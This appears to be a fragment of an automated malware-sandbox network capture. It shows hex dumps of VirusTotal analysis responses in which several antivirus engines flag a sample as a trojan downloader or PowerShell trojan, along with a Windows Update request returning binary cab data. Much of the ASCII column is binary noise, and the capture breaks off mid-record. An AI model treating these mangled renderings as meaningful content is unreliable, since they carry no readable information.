                                                                                                                                                                                                                    2024-04-25 19:55:45 UTC1280INData Raw: 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 76 61 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 76 61 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 33 2e 39 2e 38 34 39 34 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "undetected", "result": null }, "Avast": { "method": "blacklist", "engine_name": "Avast", "engine_version": "23.9.8494.0",
                                                                                                                                                                                                                    2024-04-25 19:55:45 UTC1408INData Raw: 32 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 54 72 6f 6a 61 6e 44 6f 77 6e 6c 6f 61 64 65 72 3a 41 70 70 6c 69 63 61 74 69 6f 6e 2f 47 65 6e 65 72 69 63 2e 31 38 33 34 62 30 63 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4e 41 4e 4f 2d 41 6e 74 69 76 69 72 75 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e
                                                                                                                                                                                                                    Data Ascii: 27", "category": "malicious", "result": "TrojanDownloader:Application/Generic.1834b0c4" }, "NANO-Antivirus": { "method": "blacklist", "engine_n
                                                                                                                                                                                                                    2024-04-25 19:55:45 UTC1408INData Raw: 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 56 49 50 52 45 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 56 49 50 52 45 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 36 2e 30 2e 30 2e 33 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: t": null }, "VIPRE": { "method": "blacklist", "engine_name": "VIPRE", "engine_version": "6.0.0.35", "engine_update": "20240425",
                                                                                                                                                                                                                    2024-04-25 19:55:45 UTC1280INData Raw: 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 76 69 72 61 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 38 2e 33 2e 33 2e 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 58 63 69 74 69 75 6d 22
                                                                                                                                                                                                                    Data Ascii: "engine_name": "Avira", "engine_version": "8.3.3.18", "engine_update": "20240425", "category": "undetected", "result": null }, "Xcitium"
                                                                                                                                                                                                                    2024-04-25 19:55:45 UTC1408INData Raw: 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 5a 6f 6e 65 41 6c 61 72 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 48 45 55 52 3a 54 72 6f 6a 61 6e 2e 50 6f 77 65 72 53 68 65 6c 6c 2e 41 67 65 6e 74 2e 67
                                                                                                                                                                                                                    Data Ascii: list", "engine_name": "ZoneAlarm", "engine_version": "1.0", "engine_update": "20240425", "category": "malicious", "result": "HEUR:Trojan.PowerShell.Agent.g


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    192192.168.2.164994774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:45 UTC549OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:46 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: af38f01c80583e8771e0d8aebbd8d8de
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:46 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:46 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    193192.168.2.164994813.85.23.86443
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:46 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3pC1lROSsYyfH1k&MD=af7277zy HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                    2024-04-25 19:55:47 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                    ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                                    MS-CorrelationId: f0c5f394-c56e-4963-83a6-a6c6a96c6d2f
                                                                                                                                                                                                                    MS-RequestId: 699aeeec-1910-48ee-bb6b-0c664b9317e2
                                                                                                                                                                                                                    MS-CV: Vo1RGN6i3Ee/HAhM.0
                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:46 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Length: 25457
                                                                                                                                                                                                                    2024-04-25 19:55:47 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                                                    Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                                                    2024-04-25 19:55:47 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                                                    Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    194192.168.2.164994974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:47 UTC942OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQzNzk1MzU1NzMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTQ2LjQzNQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: c1c28da7dea62503a09aa998fd3b53b0
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:48 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 23921
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:48 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44 6b 7a 4e 67 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 61 6e 61 6c 79 73 69 73 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 61 6e 61 6c 79 73 65 73 2f 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==", "type": "analysis", "links": { "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3ND
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC1408INData Raw: 20 20 20 22 73 75 73 70 69 63 69 6f 75 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 64 65 74 65 63 74 65 64 22 3a 20 34 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 72 6d 6c 65 73 73 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 66 69 72 6d 65 64 2d 74 69 6d 65 6f 75 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 61 69 6c 75 72 65 22 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 2d 75 6e 73 75 70 70 6f 72 74 65 64 22 3a 20 38 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75
                                                                                                                                                                                                                    Data Ascii: "suspicious": 0, "undetected": 44, "harmless": 0, "timeout": 0, "confirmed-timeout": 0, "failure": 2, "type-unsupported": 8 }, "resu
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC546INData Raw: 30 32 32 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 41 54 2d 51 75 69 63 6b 48 65 61 6c 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: 022.1", "engine_update": "20240423", "category": "undetected", "result": null }, "CAT-QuickHeal": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC1408INData Raw: 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 6b 79 68 69 67 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 76 32 30 32 31 2e 32 2e 30 2b 34 30 34 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 41 72 74 65 6d 69 73 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: cklist", "engine_name": "Skyhigh", "engine_version": "v2021.2.0+4045", "engine_update": "20240425", "category": "malicious", "result": "Artemis"
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC1408INData Raw: 30 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 72 6f 77 64 53 74 72 69 6b 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67
                                                                                                                                                                                                                    Data Ascii: 0.0", "engine_update": "20240423", "category": "undetected", "result": null }, "CrowdStrike": { "method": "blacklist", "eng
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC1280INData Raw: 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 72 63 61 62 69 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 72 63 61 62 69 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 30 32 32 2e 30 2e 30 2e 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67
                                                                                                                                                                                                                    Data Ascii: ted", "result": null }, "Arcabit": { "method": "blacklist", "engine_name": "Arcabit", "engine_version": "2022.0.0.18", "eng
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 54 72 6f 6a 61 6e 2e 47 65 6e 2e 4d 42 54 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6c 61 73 74 69 63 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 6c 61 73 74 69 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f
                                                                                                                                                                                                                    Data Ascii: "category": "malicious", "result": "Trojan.Gen.MBT" }, "Elastic": { "method": "blacklist", "engine_name": "Elastic", "engine_
                                                                                                                                                                                                                    2024-04-25 19:55:48 UTC1408INData Raw: 65 73 75 6c 74 22 3a 20 22 4f 74 68 65 72 3a 4d 61 6c 77 61 72 65 2d 67 65 6e 20 5b 54 72 6a 5d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 79 6e 65 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 79 6e 65 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 34 2e 30 2e 31 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32
                                                                                                                                                                                                                    Data Ascii: esult": "Other:Malware-gen [Trj]" }, "Cynet": { "method": "blacklist", "engine_name": "Cynet", "engine_version": "4.0.1.1", "engine_update": "2
